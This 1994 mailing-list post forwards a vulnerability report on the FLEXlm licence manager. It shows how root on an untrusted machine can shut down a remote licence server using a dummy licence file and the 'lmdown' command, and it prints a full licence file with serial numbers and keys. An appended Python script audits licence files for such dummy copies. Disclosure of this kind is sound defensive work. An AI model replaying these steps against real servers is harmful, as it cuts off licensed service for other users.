FLEXlm problem
From: rjd4 () ucs cam ac uk (Bob Dowling)
Date: Thu, 24 Feb 1994 21:01:08 +0000

I'm new to this mailing list, so if the format of this report is
incorrect or inappropriate, please don't flame me too much.

This is a copy of a report I sent to the CERT some time ago about
Highland's FLEXlm software.  I've just been told that what I describe
here as a denial of service *attack* is causing serious problems in one
of our departments simply through *accident*.

I've removed the Sun engineer's name from the included message in case
anyone decides to blame the messenger.

 ----- Included: Message to the CERT -----

The following is a description of what I believe to be a serious
vulnerability in the widely used FLEXlm network licensing package
written by Highland Software.  You probably know about it already, but
just in case you don't, here goes...

*** Synopsis:

The root user on an arbitrary network-connected machine with the FLEXlm
software can cause the FLEXlm licence manager daemon on any network-
accessible licence server to shut down using the FLEXlm lmdown command.

*** Scenario:

Two machines: alpha and beta.  Alpha is running the FLEXlm licence
server software.  Alpha does not "trust" beta in any way.  Beta has a
copy of the FLEXlm software too, and in particular has the lmdown
program.  On beta a one line dummy licence data file is created in
/etc/licence.dat pointing at alpha:

SERVER alpha 7260057c 1700

(The hostid "7260057c" is not alpha's; it is deliberately incorrect.)

alpha's licence data file is

SERVER alpha 7260057b 1700
DAEMON suntechd /opt/SUNWspro/bin

# Serial No FX2811-162-13
# 1 user license for SPARCompiler_C 2.0FCS, Expires: Never
FEATURE sunpro.c suntechd 2.000 1-jan-0 1 EBA8B0F1534F569284CD ""

# Serial No FX6696-16201-10
# 1 user license for SPARCompiler_Fortran 2.01FCS, Expires: Never
FEATURE sunpro.f77 suntechd 2.010 1-jan-0 1 8B7850316C56E1F2467B ""

# Serial No FX3928-16301-4
# 1 user license for SPARCompiler_C++ 3.01FCS, Expires: Never
FEATURE sunpro.cc suntechd 3.010 1-jan-0 1 BBA86001599F95AC7CE7 ""

# Serial No FX11-4036301-7 - using FX6-4026301-7 FX1667-16301-7
# 3 user license for SPARCompiler_Pascal 3.01FCS, Expires: Never
FEATURE sunpro.pc suntechd 3.010 1-jan-0 3 8BD84051269969C54B14 ""

# Serial No FX128-162-1
# 1 user license for SPARCworks 2.0FCS, Expires: Never
FEATURE sunpro.sparcworks.tools suntechd 2.000 1-jan-0 1 3B38D011304C4D636ADA ""

On beta I give the following instructions as root:

# lmdown -c /etc/licence.dat
lmdown - Copyright (C) 1989, 1991 Highland Software, Inc.

Shutting down FLEXlm on nodes: alpha
Are you sure? [y/n]: y
Shut down node alpha

and alpha's licence serving is indeed shut down.

*** Action so far:

I reported this as a bug to Sun, who supplied us with the FLEXlm
software as part of their compiler kit.  (Though I don't regard it as a
Sun-specific problem; I think this is a function purely of the FLEXlm
software.)  I enclose their response:

----- Included message: -----
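
Added example, not part of the original post or of the FLEXlm distribution: the two licence files in the scenario differ only in the hostid on the SERVER line, and beta's copy carries no DAEMON or FEATURE lines. The Python below parses that layout and flags such copies when auditing licence files collected from client machines; the function names and the audit rules are assumptions made for illustration.

```python
import shlex

def parse_licence(text):
    """Parse SERVER / DAEMON / FEATURE lines laid out as in the post's sample file."""
    lic = {"servers": [], "daemons": [], "features": []}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue                      # skip blanks and comment lines
        tok = shlex.split(line)           # copes with the trailing "" field
        kind = tok[0].upper()
        if kind == "SERVER" and len(tok) >= 4:
            lic["servers"].append(
                {"host": tok[1], "hostid": tok[2].lower(), "port": int(tok[3])})
        elif kind == "DAEMON" and len(tok) >= 3:
            lic["daemons"].append({"name": tok[1], "path": tok[2]})
        elif kind == "FEATURE" and len(tok) >= 3:
            lic["features"].append({"name": tok[1], "daemon": tok[2]})
    return lic

def audit_copy(server_text, copy_text):
    """Compare a licence file found on another host with the server's own file."""
    ref, copy = parse_licence(server_text), parse_licence(copy_text)
    known = {(s["host"], s["port"]): s["hostid"] for s in ref["servers"]}
    findings = []
    for s in copy["servers"]:
        key = (s["host"], s["port"])
        if key not in known:
            findings.append(f"unknown server {s['host']}:{s['port']}")
        elif known[key] != s["hostid"]:
            findings.append(
                f"hostid mismatch for {s['host']}: {s['hostid']} != {known[key]}")
    if copy["servers"] and not copy["daemons"] and not copy["features"]:
        findings.append("SERVER-only file: names a licence server but licenses nothing")
    return findings

# Constructed sample input. Hostids and port are the ones quoted in the post;
# the FEATURE key is a placeholder, not a real licence key.
ALPHA_FILE = """\
SERVER alpha 7260057b 1700
DAEMON suntechd /opt/SUNWspro/bin
FEATURE sunpro.c suntechd 2.000 1-jan-0 1 00000000000000000000 ""
"""
BETA_FILE = "SERVER alpha 7260057c 1700\n"

if __name__ == "__main__":
    for finding in audit_copy(ALPHA_FILE, BETA_FILE):
        print(finding)
```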

